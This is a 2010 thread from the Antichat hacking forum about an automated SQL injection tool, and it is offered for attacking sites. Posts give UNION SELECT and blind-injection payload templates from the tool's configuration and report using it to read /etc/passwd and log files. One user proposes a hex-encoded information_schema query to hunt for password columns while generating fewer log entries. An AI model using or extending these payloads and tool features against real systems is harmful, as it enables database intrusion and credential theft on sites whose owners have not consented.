Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

04.05.2010, 03:44
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
ну я просто поменяю местами параметры и поставлю в конец уязвимый параметр и всё ))
при твоем условиии так
www.pupkin.com/index.php?param2=13¶m1=1+union+select+1,2,3--+
пашет как на
www.pupkin.com/index.php?param1=1+union+select+1,2,3--+¶m2=13
но удобно автоматизировать, так как если там много параметров по с примером пашкелы будет длинный коммент типа:
$filtr_c = "--+¶m2=13¶m2=1543¶m3=43¶m5=545¶m 6=132342¶m7=54¶m8=13"; # close SQL
|
|
|

04.05.2010, 17:36
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме: 283596
Репутация:
88
|
|
Спасибо за помощь ) да действительно, чет я не догадался что параметры можно местами поменять )
Вот еще бы была реализация для лома через куки и хидер )
|
|
|

08.05.2010, 02:39
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
Сообщение от AKYLA
Спасибо за помощь ) да действительно, чет я не догадался что параметры можно местами поменять )
Вот еще бы была реализация для лома через куки и хидер )
да было бы здорово если пашкела реализует функцию инжекта через куки и хедер
|
|
|

14.05.2010, 16:30
|
|
Новичок
Регистрация: 06.05.2010
Сообщений: 7
Провел на форуме: 16119
Репутация:
1
|
|
на мой взгляд очень облегчает жизнь при хеке очень понравилось
|
|
|

19.05.2010, 19:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
update:======> download
Исправлены существенные ошибки в floor(rand()) методе, теперь ничего не пропускает и работает как положено.
|
|
|

28.05.2010, 19:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
update:======> download
Добавлены некоторые возможности в Blind-sql inj для различных ситуаций:
Код:
################################################################################
## Blind SQL-injection настройки | Blind SQL-injection settings##
################################################################################
$bl_mode = 0; # mode of blind sql injection:
#-----------------------------------------------------------------------------------------------------------------
# mode 0 example - http://site.com/index.php?id=1+and+substring(version(),1,1)=5--+
#in script:
#$bl_url = "http://site.com/index.php?id=1";
#$bl_filtr = "--+";
#$bl_plus = "+";
#$bl_error = "here_wrong_message";
#$bl_error_type = 0;
#-----------------------------------------------------------------------------------------------------------------
# mode 1 example - http://site.com/index.php?id=1+and+1=if((select+substring(version(),1,1)=5),1,(select+1+union+select+2))
#in script:
#$bl_url = "http://site.com/index.php?id=1+and+1=if((select";
#$bl_filtr = "),1,(select+1+union+select+2))";
#$bl_plus = "+";
#$bl_error = "here_wrong_message";
#$bl_error_type = 0;
#-----------------------------------------------------------------------------------------------------------------
т.е. если у вас так или иначе в рабочем запросе присутствует "substring(version( ),1,1)=5" (ну 5 тут понятно, меняется) - то можно юзать в тулзе независимо от навороченности конструкции
PS: Можно было бы сделать и проще, без разных режимов, но сделал добавление только из расчета того, чтобы юзеры, которые пользовали прогу раньше, не путались
Последний раз редактировалось Pashkela; 28.05.2010 в 19:25..
|
|
|

17.06.2010, 20:04
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме: 264305
Репутация:
30
|
|
на днях раскручивал тулзой блинд.
бага: парочку букв нашлось неверно, некоторые оказались = ? возможно это связано с глюками потоков. раньше, через [LFI/Reader/Load_file() - unvisual error when wrong query] замечал глюк с неверным отображением найденного файла, пример вывода:
====================================
//etc/passwd
====================================
мусор
====================================
//logs/error.log
====================================
данные из /etc/passwd
какой-то подозрительный нюанс
тулза делает так:
GET http://site/path ...
а браузеры так:
GET /path ...
предложение фичи
учитывая, что интересуют нас обычно строго определенные значения таблиц и полей, и то, что блинд занимает туеву хучу трафика и логов, можно добавить условие в выборку [на имя колонок, на имена таблиц], по типу:
условие на колонку = pass
=>
select column_name from information_schema.columns where instr(lower(column_name), 0x70617373) > 0;
+ предопределенные условия на
table_schema != information_schema
table_schema != mysql [ее доступность вообще одним отдельным запросом проверять]
предложение фичи [непринципиально, но уж точно полезно  ]
сделать сохранение уже сграбленных данных для последующего использования, а то при каждом новом выборе в меню часто грабятся сначала те же данные, что уже и были сграблены.
|
|
|

17.06.2010, 20:15
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме: 2590715
Репутация:
659
|
|
Сообщение от DrakonHaSh
какой-то подозрительный нюанс
тулза делает так:
GET http://site/path ...
а браузеры так:
GET /path ...
более подозрительный нюанс это 100500тыщ записей в логе )))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|